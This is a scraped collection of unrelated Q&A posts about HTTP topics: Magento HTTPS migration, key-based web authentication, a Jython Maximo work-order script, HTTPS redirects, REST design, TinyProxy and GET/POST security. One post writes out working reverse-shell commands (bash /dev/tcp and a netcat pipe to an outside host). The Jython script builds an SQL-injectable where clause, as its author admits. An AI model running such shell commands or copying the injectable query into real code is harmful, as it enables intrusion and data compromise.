M2 2.2.11 moving http to https, hostname error, url changes not reflected

Updated Magento to 2.2.11 for new payment processor extension. Extension requires everything to go through https so I enabled that for the domain (shared hosting). Compiled, deployed, reindexed, cleaned up caches. However the frontend continues to use http and backend only accessible (via http) if i clear cookies before every session.

Guides instruct me to change values in store/system config/web to have both secure and unsecure url point to https. I am unable to change these as putting in the https url and trying to save changes results in the following error:

The input appears to be a DNS hostname but cannot match TLD against
known list; The input does not appear to be a valid URI hostname; The
input does not appear to be a valid local network name

I’ve manually edited the base_url values in the db but when I load store/config/web these changes are not reflected. I am at a loss as to where it’s pulling the data on the admin backend since it’s ignoring the db values.

db config:
db config

store/config/web/unsecure and secure urls:
store/config/web

store/config/web cookie settings:
enter image description here

You can tell this isn’t my day job but I am managing the e-com for my dad since his budget doesn’t allow someone actually qualified. Any help would be most welcome.

web server – HTTP authentication with public/private key pair

I’m looking for a way to authenticate clients/users at a web server with public/private key pairs and already read this question:
Public key authentication or similar over HTTP/HTTPS? The answers are similiar to everything I found on the web. In short: “If you want public key authentication via HTTPS, use SSL client certificates”.

However, I’m looking for a solution which is as simple and secure as SSH authentication with public/private keys. My problem with SSL client certificates is, that you need a CA and this makes a big difference from a security point of view, imho.

Here is why: If attackers steal your CA’s private key, they are able to authenticate with any user, because they can sign their own client certificates. In the case of SSH, if attackers steal a user’s private key, they can only authenticate as this single user.

So in conclusion I have to make sure that my CA is secured and the best way is to have a dedicated system / computer serving as CA. This means significantly higher effort and higher costs.


Considering security I think it’s arguable which mechanism is better. But I think if public key authentication is sufficient for SSH access, it should also apply to web application authentication. Also notice, that I only want to use public/private key as an addition to my existing HTTP basic (user/password) authentication in order to increase security. Actually, my goal was to increase security by a second factor with minimal effort and without requiring the users to use token generators.

javascript – Is it possible to load data from the server using a HTTP POST request within a Magento Module js file?

Is it possible to load data from the server using an HTTP POST request within a Magento Module js file?

File located in
app/code/MyVendor/myCustomModule/view/frontend/web/js/mycustom.js

Example request:

   function test(){
      $.post("sample_data.php", function(data, status){
        alert("Data: " + data + "nStatus: " + status);
      });
    };

On the frontend I get 403 error when the sample_data.php is called

bash – Unable to start reverse shell over HTTP

I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it’s HTTP)
  • The connection fails; I don’t even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I’m doing wrong?

python – Create or update record via HTTP request

I have an external system that sends an HTTP request to a Jython script (in IBM’s Maximo Asset Management platform).

The Jython 2.7.0 script does this:

  1. Accepts an HTTP request: http://server:host/maximo/oslc/script/CREATEWO?_lid=wilson&_lpwd=wilson&f_wonum=LWO0382&f_description=LEGACY WO&f_classstructureid=1666&f_status=APPR&f_wopriority=1&f_assetnum=LA1234&f_worktype=CM
  2. Loops through parameters:
    • Searches for parameters that are prefixed with f_ (‘f’ is for field-value)
    • Puts the parameters in a list
    • Removes the prefix from the list values (so that the parameter names match the database field names).
  3. Updates or creates records via the parameters in the list:
    • If there is an existing record in the system with the same work order number, then the script updates the exiting record with the parameter values from the list.
    • If there isn’t an existing record, then a new record is created (again, from the parameter values from the list).
  4. Finishes by returning a message to the external system (message: updated, created, or other (aka an error)).

Can the script be improved?


from psdi.server import MXServer
from psdi.mbo import MboSet

params = list( param for param in request.getQueryParams() if param.startswith('f_') )
paramdict={} 
resp='' 
for p in params:
    paramdict(p(2:))=request.getQueryParam(p)

woset = MXServer.getMXServer().getMboSet("workorder",request.getUserInfo())
whereClause = "wonum= '" + request.getQueryParam("f_wonum")+ "'"

woset.setWhere(whereClause)
woset.reset()
woMbo = woset.moveFirst()

if woMbo is not None:
    for k,v in paramdict.items():
        woMbo.setValue(k,v,2L)
    resp = 'Updated workorder ' + request.getQueryParam("f_wonum")
    woset.save()
    woset.clear()
    woset.close()
else:
    woMbo=woset.add()
    for k,v in paramdict.items():
        woMbo.setValue(k,v,2L)
    resp = 'Created workorder ' + request.getQueryParam("f_wonum")
    woset.save()
    woset.clear()
    woset.close()
responseBody = resp

Note 1: I’ve been told that the where clause in this script is vulnerable to SQL injection. I’m aware of this issue and have reached out to my organization’s technical/security experts for ideas about how to mitigate this risk.

Note 2: Unfortunately, I’m not able to import Python 2.7.0 libraries into my Jython implementation. In fact, I don’t even have access to all of the standard python libraries.

Note 3: The acronym ‘MBO’ stands for ‘Master Business Object’ (it’s an IBM thing). For the purpose of this question, a Master Business Object can be thought of as a work order record. Additionally, the constant 2L tells the system to override any MBO rules/constraints.

encryption – Solution to User Initial HTTP Requests Unencrypted Despite HTTPS Redirection?

It is my understanding that requests from a client browser to a webserver will initially follow the specified protocol e.g, HTTPS, and default to HTTP if not specified (Firefox Tested). On the server side it is desired to enforce a strict type HTTPS for all connections for the privacy of request headers and as a result HTTPS redirections are used. The problem is that any initial request where the client does not explicitly request HTTPS will be sent unencrypted. For example, client instructs browser with the below URL command.

google.com/search?q=unencrypted-get

google.com will redirect the client browser to use HTTPS but the initial HTTP request and GET parameters were already sent unencrypted possibly compromising the privacy of the client. Obviously there is nothing full-proof that can be done by the server to mitigate this vulnerability but:

  1. Could this misuse compromise the subsequent TLS security possibly through a known-plaintext
    attack (KPA)?
  2. Are there any less obvious measures that can be done to mitigate this possibly through some
    DNS protocol solution?
  3. Would it be sensible for a future client standard to always initially attempt with HTTPS as the default?

rest – Is it a good practice to have an endpoint URL with parameter accepting different type of values according to an indicator in the HTTP header?

Assume a resource URL in the context of REST API:

/sites/<site id or site code>/buildings/<building id or building code>

The value of the two path parameters, <site id or site code> and <building id or building code>, are as the name indicates, can be either id or code. Implicitly it means:

for instance, there is a building with 1 as building id and rake as building code, and it is located in the site with 5 as the site id and SF as the site code, then the following endpoint URL should retrieve the same result:

  • /sites/5/buildings/1
  • /sites/5/buildings/rake
  • /sites/SF/buildings/1
  • /sites/SF/buildings/rake

In order to reduce the ambiguity, there is a hint in the HTTP header, e.g. path-parameter-type with value as CODE or ID, indicating the given values of the path parameters are either code or ID.

Even though, the implementation of such resource endpoint contains lots of if conditions due to the ambiguity. However, from the end-user’s aspect, this seems to be handy

My question is whether such endpoint design is a good practice or a typical bad practice albeit the fact that there is a type indicator in the HTTP header?

web browser – Is ‘google safe browsing’ makes an http request for all opened URL?

I know the Google safe browsing DB, used both by Firefox and Chrome to prevent opening malicious web-sites by displaying the known red screen:

enter image description here

But isn’t a privacy issue ? Is GSB makes a [HTTP API call][7] for each opened URL or use a cached browser DB ?

jenkins – TinyProxy Forward from HTTP to HTTPS

so I have a server that is sitting behind HTTPS.

TechStack I use is:

Jenkins > BranchSourcePlugin> Tinyproxy> https://bitbucketExample.com

I want to use tiny proxy to forward all traffics to bitbucket.
Here is my TinyProxy configuration:

User tinyproxy
Group tinyproxy

Port 8888
Timeout 600
DefaultErrorFile "/usr/share/tinyproxy/default.html"
StatFile "/usr/share/tinyproxy/stats.html"
LogFile "/var/log/tinyproxy/tinyproxy.log"
LogLevel Info
PidFile "/var/run/tinyproxy/tinyproxy.pid"
MaxClients 100
MinSpareServers 5
MaxSpareServers 20
StartServers 10
MaxRequestsPerChild 0
ViaProxyName "tinyproxy"
ConnectPort 443
ConnectPort 563
ConnectPort 8888

An tips would be welcomed

parameter – vulnerability of http GET

TL;DR: HTTPS provides encryption, and it’s the only thing protecting the parameters.

It’s well known that GET requests with ?xx=yy arguments embedded can be altered in transit, and therefore are insecure.

If you are not using encryption, everything is insecure: HTTP, Telnet, FTP, TFTP, IRC, SNMP, SMTP, IMAP, POP3, DNS, Gopher…

If I change the request to POST…

…it does not change anything at all.

and use HTTPS…

HTTPS changes everything.

Any HTTP request not protected by TLS is not protected. No matter if you use GET, POST, PUT, if it’s a custom header, none changes a thing.

For example, this is a GET request:

GET /test?field1=value1&field2=value2 HTTP/1.1
Host: foo.exam
Accept: text/html

And this is a POST request:

POST /test HTTP/1.1
Host: foo.example
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

field1=value1&field2=value2

What is the difference? On the GET request, the parameters are on the first line, and on the POST, the parameters are on the last line. Just that. The technical reasons behind GET or POST are not the point here.

Suppose GET style parameters were added to a POST request – would those parameters be reliably ignored?

It depends entirely on the application. On PHP, for example, if the application expects $username = $_POST['username'], sending it as GET parameter changes nothing at all, as the application will get the POST parameter.

What about some sort of security downgrade attack? If the URL manipulator forces HTTPS transactions to fail, and then the client/server “helpfully” downgrade to HTTP, which would allow the unencrypted POST body to be manipulated.

Not easy for properly configured servers. If they use the HTTP Strict Transport Security header, it forces the client to only access the site using HTTPS, even if the user forces HTTP and port 80. The browser will helpfully upgrade to HTTPS, not the other way.

Even on servers that not use HSTS headers, if the first access is done via HTTPS, it’s not trivial to downgrade to HTTP. The attacker must send a faked certificate, and the client must accept the faked certificate in order to an HTTPS connection be redirected to HTTP. But if the attacker succeeded on this, he will usually keep using HTTPS as the client already accepted his fake certificate anyway.